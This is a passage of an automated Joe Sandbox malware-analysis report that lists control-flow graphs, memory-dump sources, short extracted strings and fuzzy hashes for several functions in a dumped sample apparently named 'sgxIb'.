                                              control_flow_graph 629 6bd7e98-6bd7eb6 630 6bd7eb8-6bd7ebb 629->630 631 6bd7ebd-6bd7ed7 630->631 632 6bd7edc-6bd7edf 630->632 631->632 633 6bd7ef6-6bd7ef9 632->633 634 6bd7ee1-6bd7eef 632->634 635 6bd7f1c-6bd7f1f 633->635 636 6bd7efb-6bd7f17 633->636 645 6bd7f3e-6bd7f54 634->645 646 6bd7ef1 634->646 638 6bd7f2c-6bd7f2e 635->638 639 6bd7f21-6bd7f2b 635->639 636->635 642 6bd7f35-6bd7f38 638->642 643 6bd7f30 638->643 642->630 642->645 643->642 649 6bd816f-6bd8179 645->649 650 6bd7f5a-6bd7f63 645->650 646->633 651 6bd7f69-6bd7f86 650->651 652 6bd817a-6bd81af 650->652 659 6bd815c-6bd8169 651->659 660 6bd7f8c-6bd7fb4 651->660 655 6bd81b1-6bd81b4 652->655 657 6bd83e9-6bd83ec 655->657 658 6bd81ba-6bd81c9 655->658 661 6bd840f-6bd8412 657->661 662 6bd83ee-6bd840a 657->662 670 6bd81e8-6bd822c 658->670 671 6bd81cb-6bd81e6 658->671 659->649 659->650 660->659 682 6bd7fba-6bd7fc3 660->682 663 6bd84bd-6bd84bf 661->663 664 6bd8418-6bd8424 661->664 662->661 667 6bd84c6-6bd84c9 663->667 668 6bd84c1 663->668 673 6bd842f-6bd8431 664->673 667->655 672 6bd84cf-6bd84d8 667->672 668->667 680 6bd83bd-6bd83d3 670->680 681 6bd8232-6bd8243 670->681 671->670 677 6bd8449-6bd844d 673->677 678 6bd8433-6bd8439 673->678 685 6bd844f-6bd8459 677->685 686 6bd845b 677->686 683 6bd843d-6bd843f 678->683 684 6bd843b 678->684 680->657 694 6bd8249-6bd8266 681->694 695 6bd83a8-6bd83b7 681->695 682->652 689 6bd7fc9-6bd7fe5 682->689 683->677 684->677 688 6bd8460-6bd8462 685->688 686->688 692 6bd8464-6bd8467 688->692 693 6bd8473-6bd84ac 688->693 699 6bd7feb-6bd8015 689->699 700 6bd814a-6bd8156 689->700 692->672 693->658 712 6bd84b2-6bd84bc 693->712 694->695 707 6bd826c-6bd8362 call 6bd66b8 694->707 695->680 695->681 713 6bd801b-6bd8043 699->713 714 6bd8140-6bd8145 699->714 700->659 700->682 762 6bd8364-6bd836e 707->762 763 6bd8370 707->763 713->714 721 6bd8049-6bd8077 713->721 714->700 721->714 726 6bd807d-6bd8086 721->726 726->714 728 6bd808c-6bd80be 726->728 735 6bd80c9-6bd80e5 728->735 736 6bd80c0-6bd80c4 728->736 735->700 738 6bd80e7-6bd813e call 6bd66b8 735->738 736->714 737 6bd80c6 736->737 737->735 738->700 764 6bd8375-6bd8377 762->764 763->764 764->695 765 6bd8379-6bd837e 764->765 766 6bd838c 765->766 767 6bd8380-6bd838a 765->767 768 6bd8391-6bd8393 766->768 767->768 768->695 769 6bd8395-6bd83a1 768->769 769->695
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q
                                              • API String ID: 0-127220927
                                              • Opcode ID: 023515e55247cc95fedd739f473bad67516c0b45104c58e899d43a9f80873421
                                              • Instruction ID: d4aca8f73faeb2e9117756ee479605a167cdb5662882b5e6298852ff3a884c29
                                              • Opcode Fuzzy Hash: 023515e55247cc95fedd739f473bad67516c0b45104c58e899d43a9f80873421
                                              • Instruction Fuzzy Hash: 9B02BD70B0021A8FDB54DF69D890AAEB7F6FF84314F108569D4199B394EB74EC46CB81
                                              Function 06BD56B0 Relevance: 1.8, Strings: 1, Instructions: 594COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 988 6bd56b0-6bd56cd 989 6bd56cf-6bd56d2 988->989 990 6bd570a-6bd570d 989->990 991 6bd56d4-6bd56da 989->991 992 6bd570f-6bd5711 990->992 993 6bd5714-6bd5717 990->993 994 6bd56e0-6bd56e8 991->994 995 6bd5893-6bd58c3 991->995 992->993 996 6bd5719-6bd5726 993->996 997 6bd572b-6bd572e 993->997 994->995 998 6bd56ee-6bd56fb 994->998 1010 6bd58cd-6bd58d0 995->1010 996->997 1000 6bd5741-6bd5744 997->1000 1001 6bd5730-6bd5736 997->1001 998->995 999 6bd5701-6bd5705 998->999 999->990 1006 6bd5746-6bd574d 1000->1006 1007 6bd5752-6bd5755 1000->1007 1004 6bd582d-6bd5837 1001->1004 1005 6bd573c 1001->1005 1013 6bd583e-6bd5840 1004->1013 1005->1000 1006->1007 1008 6bd5768-6bd576b 1007->1008 1009 6bd5757-6bd575d 1007->1009 1011 6bd576d-6bd5776 1008->1011 1012 6bd5777-6bd577a 1008->1012 1014 6bd5820-6bd5823 1009->1014 1015 6bd5763 1009->1015 1016 6bd58f2-6bd58f5 1010->1016 1017 6bd58d2-6bd58d6 1010->1017 1018 6bd578d-6bd5790 1012->1018 1019 6bd577c-6bd5782 1012->1019 1023 6bd5845-6bd5848 1013->1023 1022 6bd5828-6bd582b 1014->1022 1015->1008 1020 6bd5909-6bd590c 1016->1020 1021 6bd58f7-6bd58fe 1016->1021 1024 6bd58dc-6bd58e4 1017->1024 1025 6bd59c2-6bd59d0 1017->1025 1032 6bd5798-6bd579b 1018->1032 1033 6bd5792-6bd5793 1018->1033 1019->991 1029 6bd5788 1019->1029 1034 6bd592e-6bd5931 1020->1034 1035 6bd590e-6bd5912 1020->1035 1030 6bd59ba-6bd59c1 1021->1030 1031 6bd5904 1021->1031 1022->1004 1022->1023 1026 6bd584a-6bd585c 1023->1026 1027 6bd5861-6bd5864 1023->1027 1024->1025 1028 6bd58ea-6bd58ed 1024->1028 1043 6bd5a00-6bd5a01 1025->1043 1044 6bd59d2-6bd59fc 1025->1044 1026->1027 1027->1001 1037 6bd586a-6bd586d 1027->1037 1028->1016 1029->1018 1031->1020 1039 6bd579d-6bd57a1 1032->1039 1040 6bd57ac-6bd57af 1032->1040 1033->1032 1041 6bd594f-6bd5952 1034->1041 1042 6bd5933-6bd5937 1034->1042 1035->1025 1038 6bd5918-6bd5920 1035->1038 1037->1019 1046 6bd5873-6bd5875 1037->1046 1038->1025 1047 6bd5926-6bd5929 1038->1047 1048 6bd5885-6bd5892 1039->1048 1049 6bd57a7 1039->1049 1050 6bd57b9-6bd57bc 1040->1050 1051 6bd57b1-6bd57b4 1040->1051 1053 6bd596a-6bd596d 1041->1053 1054 6bd5954-6bd5965 1041->1054 1042->1025 1052 6bd593d-6bd5945 1042->1052 1058 6bd5a0f-6bd5a12 1043->1058 1059 6bd5a03-6bd5a0a 1043->1059 1057 6bd59fe 1044->1057 1060 6bd587c-6bd587f 1046->1060 1061 6bd5877 1046->1061 1047->1034 1049->1040 1063 6bd57be-6bd57dd 1050->1063 1064 6bd57e2-6bd57e5 1050->1064 1051->1050 1052->1025 1062 6bd5947-6bd594a 1052->1062 1055 6bd596f-6bd5976 1053->1055 1056 6bd5977-6bd597a 1053->1056 1054->1053 1067 6bd597c-6bd5980 1056->1067 1068 6bd5994-6bd5997 1056->1068 1057->1043 1069 6bd5a18-6bd5bac 1058->1069 1070 6bd5cfb-6bd5cfe 1058->1070 1059->1058 1060->989 1060->1048 1061->1060 1062->1041 1063->1064 1065 6bd57fb-6bd57fe 1064->1065 1066 6bd57e7-6bd57f6 1064->1066 1075 6bd581b-6bd581e 1065->1075 1076 6bd5800-6bd5816 1065->1076 1066->1065 1067->1025 1074 6bd5982-6bd598a 1067->1074 1077 6bd5999-6bd59a3 1068->1077 1078 6bd59a8-6bd59aa 1068->1078 1139 6bd5ce5-6bd5cf8 1069->1139 1140 6bd5bb2-6bd5bb9 1069->1140 1072 6bd5d16-6bd5d19 1070->1072 1073 6bd5d00-6bd5d13 1070->1073 1082 6bd5d1b-6bd5d2c 1072->1082 1083 6bd5d33-6bd5d36 1072->1083 1074->1025 1081 6bd598c-6bd598f 1074->1081 1075->1014 1075->1022 1076->1075 1077->1078 1085 6bd59ac 1078->1085 1086 6bd59b1-6bd59b4 1078->1086 1081->1068 1098 6bd5d2e 1082->1098 1099 6bd5d7b-6bd5d82 1082->1099 1091 6bd5d38-6bd5d49 1083->1091 1092 6bd5d50-6bd5d53 1083->1092 1085->1086 1086->1010 1086->1030 1096 6bd5d5e-6bd5d6f 1091->1096 1103 6bd5d4b 1091->1103 1092->1069 1093 6bd5d59-6bd5d5c 1092->1093 1093->1096 1097 6bd5d76-6bd5d79 1093->1097 1096->1099 1106 6bd5d71 1096->1106 1097->1099 1101 6bd5d87-6bd5d8a 1097->1101 1098->1083 1099->1101 1101->1069 1105 6bd5d90-6bd5d93 1101->1105 1103->1092 1107 6bd5d95-6bd5da6 1105->1107 1108 6bd5db1-6bd5db4 1105->1108 1106->1097 1107->1073 1119 6bd5dac 1107->1119 1110 6bd5dce-6bd5dd1 1108->1110 1111 6bd5db6-6bd5dc7 1108->1111 1113 6bd5ddb-6bd5ddd 1110->1113 1114 6bd5dd3-6bd5dd8 1110->1114 1111->1099 1120 6bd5dc9 1111->1120 1117 6bd5ddf 1113->1117 1118 6bd5de4-6bd5de7 1113->1118 1114->1113 1117->1118 1118->1057 1122 6bd5ded-6bd5df6 1118->1122 1119->1108 1120->1110 1141 6bd5c6d-6bd5c74 1140->1141 1142 6bd5bbf-6bd5be2 1140->1142 1141->1139 1144 6bd5c76-6bd5ca9 1141->1144 1151 6bd5bea-6bd5bf2 1142->1151 1155 6bd5cae-6bd5cdb 1144->1155 1156 6bd5cab 1144->1156 1153 6bd5bf4 1151->1153 1154 6bd5bf7-6bd5c38 1151->1154 1153->1154 1164 6bd5c3a-6bd5c4b 1154->1164 1165 6bd5c50-6bd5c61 1154->1165 1155->1122 1156->1155 1164->1122 1165->1122
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $
                                              • API String ID: 0-3993045852
                                              • Opcode ID: bfb65aa1a6cd36bcae1739a41c78832618c1c621402f1012ff2cf0e498d1f254
                                              • Instruction ID: 85ac74856756d7d32043f0cd52ad500a89034db674b01e41528835defe2d440e
                                              • Opcode Fuzzy Hash: bfb65aa1a6cd36bcae1739a41c78832618c1c621402f1012ff2cf0e498d1f254
                                              • Instruction Fuzzy Hash: 9322B1B6E002159FDF64DFA4C4906AEB7B2FB84310F2484A9D45AAF354EA35DC42CB91
                                              Function 06BD6708 Relevance: .8, Instructions: 814COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5370e1446ba5c7818f42de55a0ec2315bbb5b9d5854e5d9a2eff5bdb2cb38530
                                              • Instruction ID: dd4d71e99d32f37f139a08ba9c00972bd2094a9010ea5e07fc3dd4b1f6238261
                                              • Opcode Fuzzy Hash: 5370e1446ba5c7818f42de55a0ec2315bbb5b9d5854e5d9a2eff5bdb2cb38530
                                              • Instruction Fuzzy Hash: F662AD74A002058FDB54DB68D594AADB7F2FF89314F1484A9E40ADF394EB75EC42CB81
                                              Function 06BDADE8 Relevance: 10.4, Strings: 8, Instructions: 390COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 6bdade8-6bdae06 1 6bdae08-6bdae0b 0->1 2 6bdae0d-6bdae29 1->2 3 6bdae2e-6bdae31 1->3 2->3 4 6bdb005-6bdb00e 3->4 5 6bdae37-6bdae3a 3->5 8 6bdb014-6bdb01e 4->8 9 6bdae91-6bdae9a 4->9 6 6bdae3c-6bdae49 5->6 7 6bdae4e-6bdae51 5->7 6->7 11 6bdae53-6bdae57 7->11 12 6bdae62-6bdae65 7->12 13 6bdb01f-6bdb056 9->13 14 6bdaea0-6bdaea4 9->14 11->8 17 6bdae5d 11->17 19 6bdae6f-6bdae72 12->19 20 6bdae67-6bdae6c 12->20 26 6bdb058-6bdb05b 13->26 18 6bdaea9-6bdaeac 14->18 17->12 24 6bdaebc-6bdaebe 18->24 25 6bdaeae-6bdaeb7 18->25 21 6bdae8c-6bdae8f 19->21 22 6bdae74-6bdae87 19->22 20->19 21->9 21->18 22->21 27 6bdaec5-6bdaec8 24->27 28 6bdaec0 24->28 25->24 29 6bdb05d-6bdb079 26->29 30 6bdb07e-6bdb081 26->30 27->1 32 6bdaece-6bdaef2 27->32 28->27 29->30 33 6bdb090-6bdb093 30->33 34 6bdb083 call 6bdb3e7 30->34 47 6bdaef8-6bdaf07 32->47 48 6bdb002 32->48 37 6bdb095-6bdb099 33->37 38 6bdb0a0-6bdb0a3 33->38 41 6bdb089-6bdb08b 34->41 40 6bdb0a9-6bdb0e4 37->40 42 6bdb09b 37->42 39 6bdb30c-6bdb30f 38->39 38->40 44 6bdb31c-6bdb31e 39->44 45 6bdb311-6bdb31b 39->45 52 6bdb0ea-6bdb0f6 40->52 53 6bdb2d7-6bdb2ea 40->53 41->33 42->38 50 6bdb325-6bdb328 44->50 51 6bdb320 44->51 58 6bdaf1f-6bdaf5a call 6bd66b8 47->58 59 6bdaf09-6bdaf0f 47->59 48->4 50->26 54 6bdb32e-6bdb338 50->54 51->50 61 6bdb0f8-6bdb111 52->61 62 6bdb116-6bdb15a 52->62 56 6bdb2ec 53->56 60 6bdb2ed 56->60 76 6bdaf5c-6bdaf62 58->76 77 6bdaf72-6bdaf89 58->77 63 6bdaf11 59->63 64 6bdaf13-6bdaf15 59->64 60->60 61->56 78 6bdb15c-6bdb16e 62->78 79 6bdb176-6bdb1b5 62->79 63->58 64->58 80 6bdaf64 76->80 81 6bdaf66-6bdaf68 76->81 90 6bdaf8b-6bdaf91 77->90 91 6bdafa1-6bdafb2 77->91 78->79 86 6bdb29c-6bdb2b1 79->86 87 6bdb1bb-6bdb296 call 6bd66b8 79->87 80->77 81->77 86->53 87->86 92 6bdaf95-6bdaf97 90->92 93 6bdaf93 90->93 98 6bdafca-6bdaffb 91->98 99 6bdafb4-6bdafba 91->99 92->91 93->91 98->48 100 6bdafbc 99->100 101 6bdafbe-6bdafc0 99->101 100->98 101->98
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                              • API String ID: 0-1273862796
                                              • Opcode ID: 982bb2fb3a6d167b927a7a375338598aea004243bef432bdc0f460f0b11fe745
                                              • Instruction ID: 3dff0d5c33a76dd0c7ec84ad29680d4ff17883184f6dea63c3802bad847028db
                                              • Opcode Fuzzy Hash: 982bb2fb3a6d167b927a7a375338598aea004243bef432bdc0f460f0b11fe745
                                              • Instruction Fuzzy Hash: 6DE18DB0E102098FCF68DF68D5906AEB7B6FF85304F208569D419EB354EB74D846CB81
                                              Function 06BD9268 Relevance: 5.2, Strings: 4, Instructions: 231COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 256 6bd9268-6bd928d 257 6bd928f-6bd9292 256->257 258 6bd92b8-6bd92bb 257->258 259 6bd9294-6bd92b3 257->259 260 6bd9b7b-6bd9b7d 258->260 261 6bd92c1-6bd92d6 258->261 259->258 263 6bd9b7f 260->263 264 6bd9b84-6bd9b87 260->264 268 6bd92ee-6bd9304 261->268 269 6bd92d8-6bd92de 261->269 263->264 264->257 266 6bd9b8d-6bd9b97 264->266 273 6bd930f-6bd9311 268->273 270 6bd92e0 269->270 271 6bd92e2-6bd92e4 269->271 270->268 271->268 274 6bd9329-6bd939a 273->274 275 6bd9313-6bd9319 273->275 286 6bd939c-6bd93bf 274->286 287 6bd93c6-6bd93e2 274->287 276 6bd931d-6bd931f 275->276 277 6bd931b 275->277 276->274 277->274 286->287 292 6bd940e-6bd9429 287->292 293 6bd93e4-6bd9407 287->293 298 6bd942b-6bd944d 292->298 299 6bd9454-6bd946f 292->299 293->292 298->299 304 6bd949a-6bd94a4 299->304 305 6bd9471-6bd9493 299->305 306 6bd94b4-6bd952e 304->306 307 6bd94a6-6bd94af 304->307 305->304 313 6bd957b-6bd9590 306->313 314 6bd9530-6bd954e 306->314 307->266 313->260 318 6bd956a-6bd9579 314->318 319 6bd9550-6bd955f 314->319 318->313 318->314 319->318
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q
                                              • API String ID: 0-858218434
                                              • Opcode ID: 9c45d4b942f5c3abb73b934aced6c0bab505b1074ba122fa9148adc8385e7268
                                              • Instruction ID: 75c71a19f0e3f958842ec4b1a02177d6f53d0b5c77c047d07f59e51b159aec05
                                              • Opcode Fuzzy Hash: 9c45d4b942f5c3abb73b934aced6c0bab505b1074ba122fa9148adc8385e7268
                                              • Instruction Fuzzy Hash: A2914170B0020A9FDB54EF69D8607AE73F6FF85204F108569C81DEB398EB709D468B91
                                              Function 06BDD070 Relevance: 4.5, Strings: 3, Instructions: 798COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 322 6bdd070-6bdd08b 323 6bdd08d-6bdd090 322->323 324 6bdd0d9-6bdd0dc 323->324 325 6bdd092-6bdd0a1 323->325 328 6bdd0de-6bdd120 324->328 329 6bdd125-6bdd128 324->329 326 6bdd0b0-6bdd0bc 325->326 327 6bdd0a3-6bdd0a8 325->327 330 6bdda8d-6bddac6 326->330 331 6bdd0c2-6bdd0d4 326->331 327->326 328->329 332 6bdd12a-6bdd12c 329->332 333 6bdd137-6bdd13a 329->333 347 6bddac8-6bddacb 330->347 331->324 334 6bdd559 332->334 335 6bdd132 332->335 336 6bdd13c-6bdd141 333->336 337 6bdd144-6bdd147 333->337 342 6bdd55c-6bdd568 334->342 335->333 336->337 340 6bdd149-6bdd18b 337->340 341 6bdd190-6bdd193 337->341 340->341 344 6bdd1dc-6bdd1df 341->344 345 6bdd195-6bdd1d7 341->345 342->325 346 6bdd56e-6bdd85b 342->346 351 6bdd228-6bdd22b 344->351 352 6bdd1e1-6bdd223 344->352 345->344 535 6bdd861-6bdd867 346->535 536 6bdda82-6bdda8c 346->536 349 6bddacd-6bddae9 347->349 350 6bddaee-6bddaf1 347->350 349->350 358 6bddb24-6bddb27 350->358 359 6bddaf3-6bddb1f 350->359 354 6bdd22d-6bdd26f 351->354 355 6bdd274-6bdd277 351->355 352->351 354->355 366 6bdd279-6bdd288 355->366 367 6bdd2c0-6bdd2c3 355->367 364 6bddb29 call 6bddbe5 358->364 365 6bddb36-6bddb38 358->365 359->358 386 6bddb2f-6bddb31 364->386 373 6bddb3f-6bddb42 365->373 374 6bddb3a 365->374 376 6bdd28a-6bdd28f 366->376 377 6bdd297-6bdd2a3 366->377 371 6bdd2c5-6bdd2c7 367->371 372 6bdd2d2-6bdd2d5 367->372 379 6bdd2cd 371->379 380 6bdd417-6bdd420 371->380 381 6bdd2d7-6bdd2ed 372->381 382 6bdd2f2-6bdd2f5 372->382 373->347 387 6bddb44-6bddb53 373->387 374->373 376->377 377->330 378 6bdd2a9-6bdd2bb 377->378 378->367 379->372 393 6bdd42f-6bdd43b 380->393 394 6bdd422-6bdd427 380->394 381->382 389 6bdd33e-6bdd341 382->389 390 6bdd2f7-6bdd339 382->390 386->365 406 6bddbba-6bddbcf 387->406 407 6bddb55-6bddbb8 call 6bd66b8 387->407 401 6bdd364-6bdd367 389->401 402 6bdd343-6bdd35f 389->402 390->389 403 6bdd54c-6bdd551 393->403 404 6bdd441-6bdd455 393->404 394->393 401->342 411 6bdd36d-6bdd370 401->411 402->401 403->334 404->334 421 6bdd45b-6bdd46d 404->421 432 6bddbd0 406->432 407->406 412 6bdd3b9-6bdd3bc 411->412 413 6bdd372-6bdd3b4 411->413 424 6bdd3be-6bdd400 412->424 425 6bdd405-6bdd407 412->425 413->412 443 6bdd46f-6bdd475 421->443 444 6bdd491-6bdd493 421->444 424->425 433 6bdd40e-6bdd411 425->433 434 6bdd409 425->434 432->432 433->323 433->380 434->433 445 6bdd479-6bdd485 443->445 446 6bdd477 443->446 453 6bdd49d-6bdd4a9 444->453 452 6bdd487-6bdd48f 445->452 446->452 452->453 464 6bdd4ab-6bdd4b5 453->464 465 6bdd4b7 453->465 468 6bdd4bc-6bdd4be 464->468 465->468 468->334 471 6bdd4c4-6bdd4e0 call 6bd66b8 468->471 480 6bdd4ef-6bdd4fb 471->480 481 6bdd4e2-6bdd4e7 471->481 480->403 483 6bdd4fd-6bdd54a 480->483 481->480 483->334 537 6bdd869-6bdd86e 535->537 538 6bdd876-6bdd87f 535->538 537->538 538->330 539 6bdd885-6bdd898 538->539 541 6bdd89e-6bdd8a4 539->541 542 6bdda72-6bdda7c 539->542 543 6bdd8a6-6bdd8ab 541->543 544 6bdd8b3-6bdd8bc 541->544 542->535 542->536 543->544 544->330 545 6bdd8c2-6bdd8e3 544->545 548 6bdd8e5-6bdd8ea 545->548 549 6bdd8f2-6bdd8fb 545->549 548->549 549->330 550 6bdd901-6bdd91e 549->550 550->542 553 6bdd924-6bdd92a 550->553 553->330 554 6bdd930-6bdd949 553->554 556 6bdd94f-6bdd976 554->556 557 6bdda65-6bdda6c 554->557 556->330 560 6bdd97c-6bdd986 556->560 557->542 557->553 560->330 561 6bdd98c-6bdd9a3 560->561 563 6bdd9a5-6bdd9b0 561->563 564 6bdd9b2-6bdd9cd 561->564 563->564 564->557 569 6bdd9d3-6bdd9ec call 6bd66b8 564->569 573 6bdd9ee-6bdd9f3 569->573 574 6bdd9fb-6bdda04 569->574 573->574 574->330 575 6bdda0a-6bdda5e 574->575 575->557
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q
                                              • API String ID: 0-182748909
                                              • Opcode ID: 02fad14c164c8e81d5aa0d74ea15dbc7fdb1849cd388ad621d5476d232b508c8
                                              • Instruction ID: a83d4f88efbfc86c860507e6b6b23721da727758e82be6d6773ec9f082fac7cf
                                              • Opcode Fuzzy Hash: 02fad14c164c8e81d5aa0d74ea15dbc7fdb1849cd388ad621d5476d232b508c8
                                              • Instruction Fuzzy Hash: 6762427060020A8FCB59EFA9D590A5EB7F6FF84304B10CA69D0459F369EB75EC46CB81
                                              Function 06BD4C80 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 583 6bd4c80-6bd4ca4 584 6bd4ca6-6bd4ca9 583->584 585 6bd4cab-6bd4cc5 584->585 586 6bd4cca-6bd4ccd 584->586 585->586 587 6bd53ac-6bd53ae 586->587 588 6bd4cd3-6bd4dcb 586->588 590 6bd53b5-6bd53b8 587->590 591 6bd53b0 587->591 606 6bd4e4e-6bd4e55 588->606 607 6bd4dd1-6bd4e1e call 6bd5529 588->607 590->584 592 6bd53be-6bd53cb 590->592 591->590 608 6bd4ed9-6bd4ee2 606->608 609 6bd4e5b-6bd4ecb 606->609 620 6bd4e24-6bd4e40 607->620 608->592 626 6bd4ecd 609->626 627 6bd4ed6 609->627 623 6bd4e4b 620->623 624 6bd4e42 620->624 623->606 624->623 626->627 627->608
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: fbq$XPbq$\Obq
                                              • API String ID: 0-4057264190
                                              • Opcode ID: f54ab57ce35df8e0e70b5eea1d9426c4f0ea637332730083d0a6d8e047db6f03
                                              • Instruction ID: eec8867b94b17b177f707362f1198ebe00d39cd8a5680a795d169c9cb3a6092b
                                              • Opcode Fuzzy Hash: f54ab57ce35df8e0e70b5eea1d9426c4f0ea637332730083d0a6d8e047db6f03
                                              • Instruction Fuzzy Hash: E36182B1F102199FEF54DFA5C8547AEBBF6FB88700F20842AD10AAB394DB758C458B51
                                              Function 06BD925A Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 875 6bd925a-6bd928d 876 6bd928f-6bd9292 875->876 877 6bd92b8-6bd92bb 876->877 878 6bd9294-6bd92b3 876->878 879 6bd9b7b-6bd9b7d 877->879 880 6bd92c1-6bd92d6 877->880 878->877 882 6bd9b7f 879->882 883 6bd9b84-6bd9b87 879->883 887 6bd92ee-6bd9304 880->887 888 6bd92d8-6bd92de 880->888 882->883 883->876 885 6bd9b8d-6bd9b97 883->885 892 6bd930f-6bd9311 887->892 889 6bd92e0 888->889 890 6bd92e2-6bd92e4 888->890 889->887 890->887 893 6bd9329-6bd939a 892->893 894 6bd9313-6bd9319 892->894 905 6bd939c-6bd93bf 893->905 906 6bd93c6-6bd93e2 893->906 895 6bd931d-6bd931f 894->895 896 6bd931b 894->896 895->893 896->893 905->906 911 6bd940e-6bd9429 906->911 912 6bd93e4-6bd9407 906->912 917 6bd942b-6bd944d 911->917 918 6bd9454-6bd946f 911->918 912->911 917->918 923 6bd949a-6bd94a4 918->923 924 6bd9471-6bd9493 918->924 925 6bd94b4-6bd952e 923->925 926 6bd94a6-6bd94af 923->926 924->923 932 6bd957b-6bd9590 925->932 933 6bd9530-6bd954e 925->933 926->885 932->879 937 6bd956a-6bd9579 933->937 938 6bd9550-6bd955f 933->938 937->932 937->933 938->937
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q
                                              • API String ID: 0-127220927
                                              • Opcode ID: cf9d33f5e2da8813f8ac3cf71148676538cd1877a252f50978a656bb47ef348a
                                              • Instruction ID: 56121cc9ab29da4920a09875b4b110962950704abbc9739de08985d2a3abcdc5
                                              • Opcode Fuzzy Hash: cf9d33f5e2da8813f8ac3cf71148676538cd1877a252f50978a656bb47ef348a
                                              • Instruction Fuzzy Hash: 9D513F70B001099FDB95EB78D9A0BAE73F6EB88604F108569C41DDB399EB719C068B91
                                              Function 06BD4C71 Relevance: 2.6, Strings: 2, Instructions: 142COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 941 6bd4c71-6bd4ca4 943 6bd4ca6-6bd4ca9 941->943 944 6bd4cab-6bd4cc5 943->944 945 6bd4cca-6bd4ccd 943->945 944->945 946 6bd53ac-6bd53ae 945->946 947 6bd4cd3-6bd4dcb 945->947 949 6bd53b5-6bd53b8 946->949 950 6bd53b0 946->950 965 6bd4e4e-6bd4e55 947->965 966 6bd4dd1-6bd4e1e call 6bd5529 947->966 949->943 951 6bd53be-6bd53cb 949->951 950->949 967 6bd4ed9-6bd4ee2 965->967 968 6bd4e5b-6bd4ecb 965->968 979 6bd4e24-6bd4e40 966->979 967->951 985 6bd4ecd 968->985 986 6bd4ed6 968->986 982 6bd4e4b 979->982 983 6bd4e42 979->983 982->965 983->982 985->986 986->967
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: fbq$XPbq
                                              • API String ID: 0-2292610095
                                              • Opcode ID: d85a790bb50bf71fd21556606f85c5d9f52ed48d7094d5384471af30ca5be00c
                                              • Instruction ID: a64347baf577fc01f38f232743a6febcd9b3353cab9a4661fca0ffbe39329271
                                              • Opcode Fuzzy Hash: d85a790bb50bf71fd21556606f85c5d9f52ed48d7094d5384471af30ca5be00c
                                              • Instruction Fuzzy Hash: 49518275F002199FDB54DFA5C854BAEBBF6FF88700F20852AE106AB395DA758C01CB91
                                              Function 02CEED70 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
